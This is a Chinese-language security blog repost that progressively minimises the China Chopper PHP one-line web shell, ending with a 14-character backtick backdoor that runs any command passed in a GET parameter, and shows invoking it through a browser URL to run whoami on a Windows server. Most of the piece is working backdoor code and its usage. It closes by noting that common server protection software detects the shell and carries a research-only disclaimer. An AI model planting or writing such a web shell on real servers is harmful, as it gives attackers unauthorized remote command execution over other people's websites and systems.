黑客用14个字符就能控制你的网站和服务器

admin 2022年4月23日08:27:12安全闲碎评论24 views1095字阅读3分39秒阅读模式
黑客用14个字符就能控制你的网站和服务器
点击上方“安全优佳” 可以订阅哦!

php的语言是很强大的,比强大更重要的是它的灵活性。由于它的灵活性,所以大量的php一句话web后门及变种在市面上比比皆是。最出名的莫过于桂林老兵写的菜刀软件里的一句话了。说句题外话,桂林老兵以前还是我同事的。

菜刀软件里自带的php一句话源码是:

<?php @eval($_POST['chopper']);?>

这个菜刀一句话很强大,几乎没有它做不了的事,文件修改、上传下载、数据库操作、执行命令等等,类似一个文件管理器一样的后门。抓个图你看下吧。

黑客用14个字符就能控制你的网站和服务器

我们来数一下,带空格来算总共是34个字符。今天我们来改造一下,让其缩到最短。

第一步改造:php如果支持短标签的话,可以去掉“?”后边的php,所以可以改成:

<? @eval($_POST['chopper']);?>

变成了31个字符。

第二步改造:php文件中最后一行可以去掉“?>”,所以可以改成:

<? @eval($_POST['chopper']);

变成了29个字符。

第三步改造:把php代码中的容错符“@”去掉,并且把$_POST换成$_GET,代码变成了

<? eval($_GET['chopper']);

变成了27个字符。

第四步改造:把后门中的连接密码chopper,换成数字1,代码变成了

<? eval($_GET['1']);

变成了21个字符。

第五步改造:这个没法在形式上缩短了,只能改变其功能,让这个后门只保留一个功能。后门中最重要的功能是什么?当然是执行命令。如果php网站没有在php.ini做任何限制的话,哪么可以用Backticks来执行命令,就是用重音符来执行命令,所以我们最终的代码是去掉了eval,加上“`”,变成了下边的样子:

<? `$_GET[1]`;

带空格的话,只有14个字符。不带空格的话,是13个。13个数字是不是会让你想起犹大和黑色期五呢?好像是冥冥之中注定,最短是13个字母。剩哪个空格,是可怕的第13个人?

黑客用14个字符就能控制你的网站和服务器

这个后门如何用呢?它只能执行命令,并没有回显。而且我们只用浏览器就能用。假如这个后门名叫1.php,哪么来执行一下。

//192.168.1.100/1.php?1=whoami > d:.txt

黑客用14个字符就能控制你的网站和服务器

我是在windows服务器上执行的。linux服务器你相应的命令和路径也要改一下了。如果能执行命令的话,剩下的什么事你做不了呢?但是现在服务器一般都有360、安全狗之类的防护软件,所以这个php一句话在查杀之列,你也不用太担心。

黑客用14个字符就能控制你的网站和服务器

安全优佳

http://news.secwk.com

长按识别左侧二维码,关注我们


本文始发于微信公众号(安全优佳):黑客用14个字符就能控制你的网站和服务器

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月23日08:27:12
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  黑客用14个字符就能控制你的网站和服务器 http://cn-sec.com/archives/527508.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: